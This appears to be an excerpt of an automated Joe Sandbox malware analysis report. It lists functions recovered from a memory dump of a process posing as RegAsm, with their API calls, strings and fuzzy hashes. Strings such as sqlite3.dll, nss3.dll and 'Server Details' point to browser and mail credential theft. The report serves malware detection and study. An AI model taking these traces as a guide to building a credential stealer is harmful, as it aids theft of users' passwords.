                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: _ultoasprintf
                                                                                                                                                                                                • String ID: %s %s %s
                                                                                                                                                                                                • API String ID: 432394123-3850900253
                                                                                                                                                                                                • Opcode ID: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                                                                                                                                                                • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                                                                                                                                                                                                • Opcode Fuzzy Hash: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                                                                                                                                                                • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 00409919
                                                                                                                                                                                                • SendMessageA.USER32(N\@,00001019,00000000,?), ref: 00409948
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: MessageSendmemset
                                                                                                                                                                                                • String ID: N\@
                                                                                                                                                                                                • API String ID: 568519121-3851889168
                                                                                                                                                                                                • Opcode ID: 2010a019ef781dd6939f17f8e62f95d5074ac9a6fd296138cb71cbff55b3af76
                                                                                                                                                                                                • Instruction ID: 8500237f8b168207f1c9a25e89cff2ec53edf3448a21c69821c5a9264d9502ca
                                                                                                                                                                                                • Opcode Fuzzy Hash: 2010a019ef781dd6939f17f8e62f95d5074ac9a6fd296138cb71cbff55b3af76
                                                                                                                                                                                                • Instruction Fuzzy Hash: 3C016279800205AADB209F59C845AEBB7F8FF85B45F00802DE894B6241D374A945CB79
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • LoadMenuA.USER32(00000000), ref: 00409078
                                                                                                                                                                                                • sprintf.MSVCRT ref: 0040909B
                                                                                                                                                                                                  • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                                                                                                                                                                                  • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                                                                                                                                                                  • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                                                                                                                                                                  • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                                                                                                                                                                  • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                                                                                                                                                                  • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                                                                                                                                                                  • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                                                                                                                                                                • String ID: menu_%d
                                                                                                                                                                                                • API String ID: 1129539653-2417748251
                                                                                                                                                                                                • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                                                                                                                                • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                                                                                                                                                                                • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                                                                                                                                • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • failed memory resize %u to %u bytes, xrefs: 00411706
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: _msizerealloc
                                                                                                                                                                                                • String ID: failed memory resize %u to %u bytes
                                                                                                                                                                                                • API String ID: 2713192863-2134078882
                                                                                                                                                                                                • Opcode ID: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                                                                                                                                                • Instruction ID: 6d708a2afe7937de994116278d2c06faa365a3e4d7322368aba5da3f7b150b0b
                                                                                                                                                                                                • Opcode Fuzzy Hash: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                                                                                                                                                • Instruction Fuzzy Hash: DBD0C2329092107EEB152250AC03B5FAB51DB80374F25850FF658451A1E6795C108389
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00406F96: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409805,00000000,00409723,?,00000000,00000104), ref: 00406FA1
                                                                                                                                                                                                • strrchr.MSVCRT ref: 00409808
                                                                                                                                                                                                • _mbscat.MSVCRT ref: 0040981D
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: FileModuleName_mbscatstrrchr
                                                                                                                                                                                                • String ID: _lng.ini
                                                                                                                                                                                                • API String ID: 3334749609-1948609170
                                                                                                                                                                                                • Opcode ID: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                                                                                                                                                                                                • Instruction ID: 627d3aba04136714d7c1818045af5338c576ea1e6c84acb30438f8bc90b354f8
                                                                                                                                                                                                • Opcode Fuzzy Hash: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                                                                                                                                                                                                • Instruction Fuzzy Hash: 73C080019497D018F12235212D03F4F06884F83709F34005FF801796C3EF9CA611407F
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                                                                  • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                                                                                                                  • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                                                                                                                • _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: _mbscat$_mbscpystrlen
                                                                                                                                                                                                • String ID: sqlite3.dll
                                                                                                                                                                                                • API String ID: 1983510840-1155512374
                                                                                                                                                                                                • Opcode ID: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                                                                                                                                                                • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                                                                                                                                                                                                • Opcode Fuzzy Hash: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                                                                                                                                                                • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • LoadLibraryA.KERNEL32(shell32.dll), ref: 00410D1C
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                                                • String ID: SHGetSpecialFolderPathA$shell32.dll
                                                                                                                                                                                                • API String ID: 1029625771-543337301
                                                                                                                                                                                                • Opcode ID: bd9125e53ebb38e22ea027c358b92ac6a95cbb2b5ce42350ffb603c3f4eeef8b
                                                                                                                                                                                                • Instruction ID: ef400fb4b1d3fc6097741d3c7ce2aeca37e2dca3c44752f23935f4d935815712
                                                                                                                                                                                                • Opcode Fuzzy Hash: bd9125e53ebb38e22ea027c358b92ac6a95cbb2b5ce42350ffb603c3f4eeef8b
                                                                                                                                                                                                • Instruction Fuzzy Hash: C9D0C9F8D063099AE7005BA1AD297167AB4E719312F041536A540A5263EBBCD094CE1D
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: PrivateProfileString
                                                                                                                                                                                                • String ID: A4@$Server Details
                                                                                                                                                                                                • API String ID: 1096422788-4071850762
                                                                                                                                                                                                • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                                                                                                                                • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                                                                                                                                                                                                • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                                                                                                                                • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,0000201C), ref: 0042C8E0
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,?), ref: 0042C917
                                                                                                                                                                                                • memset.MSVCRT ref: 0042C932
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0042C96E
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memcpy$memset
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 438689982-0
                                                                                                                                                                                                • Opcode ID: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                                                                                                                                                                                • Instruction ID: 02088d5bd302ba8124152156f4c24fba1fa2279ed4138068a4a2dd0dfc44ef6b
                                                                                                                                                                                                • Opcode Fuzzy Hash: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                                                                                                                                                                                • Instruction Fuzzy Hash: BC61BDB2604712AFD710DF65E8C1B2BB7E5FF84304F40892EF99896250D338E955CB9A
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • strlen.MSVCRT ref: 0040849A
                                                                                                                                                                                                • memset.MSVCRT ref: 004084D2
                                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,?,?,?,?,770145ED,?,00000000), ref: 0040858F
                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,?,?,?,?,770145ED,?,00000000), ref: 004085BA
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: FreeLocalmemcpymemsetstrlen
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3110682361-0
                                                                                                                                                                                                • Opcode ID: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                                                                                                                                                                                • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
                                                                                                                                                                                                • Opcode Fuzzy Hash: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                                                                                                                                                                                • Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000010), ref: 004161F4
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000004), ref: 00416218
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000004), ref: 0041623F
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000008), ref: 00416265
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3510742995-0
                                                                                                                                                                                                • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                                                                                                                                • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                                                                                                                                                                                                • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ??2@$memset
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1860491036-0
                                                                                                                                                                                                • Opcode ID: c78329486846fe93a7256add11836ddf78ca18624f4c1b8479d66424083257ec
                                                                                                                                                                                                • Instruction ID: ded700a689dc4ea077b1bf28e8ae47d2b9e76a7afd7a7e1dd26f08861e755b16
                                                                                                                                                                                                • Opcode Fuzzy Hash: c78329486846fe93a7256add11836ddf78ca18624f4c1b8479d66424083257ec
                                                                                                                                                                                                • Instruction Fuzzy Hash: 0B21B6B0A547508EE7558F6A9845A16FAE4FFD0710726C8AFD109DB2B2E7B8D8408F14
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • strlen.MSVCRT ref: 0040797A
                                                                                                                                                                                                • free.MSVCRT ref: 0040799A
                                                                                                                                                                                                  • Part of subcall function 00406F30: malloc.MSVCRT ref: 00406F4C
                                                                                                                                                                                                  • Part of subcall function 00406F30: memcpy.MSVCRT(00000000,00000000,?,00000000,?,004045BE,00000001,?,?,00000000,00401B21,?), ref: 00406F64
                                                                                                                                                                                                  • Part of subcall function 00406F30: free.MSVCRT ref: 00406F6D
                                                                                                                                                                                                • free.MSVCRT ref: 004079BD
                                                                                                                                                                                                • memcpy.MSVCRT(00000001,?,00000000,?,?,?,?,00000000,0044357F,00000000,?,?,00000000,0044386F,?,?), ref: 004079DD
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free$memcpy$mallocstrlen
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3669619086-0
                                                                                                                                                                                                • Opcode ID: defd1bd1be5bbd5284309495682469d6dd103d7cb5d76ad0db5bff9d1363c284
                                                                                                                                                                                                • Instruction ID: 28856836b01dc1c1490a34e4127c9d88e875caa212a522c6554fbe506b42c8ef
                                                                                                                                                                                                • Opcode Fuzzy Hash: defd1bd1be5bbd5284309495682469d6dd103d7cb5d76ad0db5bff9d1363c284
                                                                                                                                                                                                • Instruction Fuzzy Hash: A211CDB1604600EFD720DF18D880E9AB7F5EF48328B108A2EE852A76D1C735F8158B59